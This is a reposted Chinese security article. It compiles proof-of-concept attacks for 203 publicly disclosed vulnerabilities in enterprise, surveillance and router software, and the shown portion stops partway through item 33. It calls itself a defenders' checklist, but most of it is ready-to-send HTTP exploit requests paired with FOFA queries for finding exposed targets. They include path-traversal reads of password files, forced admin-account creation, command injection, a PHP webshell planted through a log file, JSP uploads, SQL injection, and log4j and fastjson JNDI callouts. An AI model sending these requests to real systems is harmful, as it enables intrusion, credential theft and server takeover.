Public Internet Vulnerability Compilation 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Public Internet Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks; this article is intended to help defenders. Defensive teams can use its contents as a checklist for risk review.

Sources: the article covers 203 POCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that were too long are replaced by the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version; press F12 and search for keywords when using it.

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).

Contents


1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT management platform arbitrary file read
21. 大华ICC intelligent IoT management platform random remote code execution
22. 大华ICC intelligent IoT management platform log4j remote code execution
23. 大华ICC intelligent IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service washing machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list


1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 hash of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, send the following request:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the planted code executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
    }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
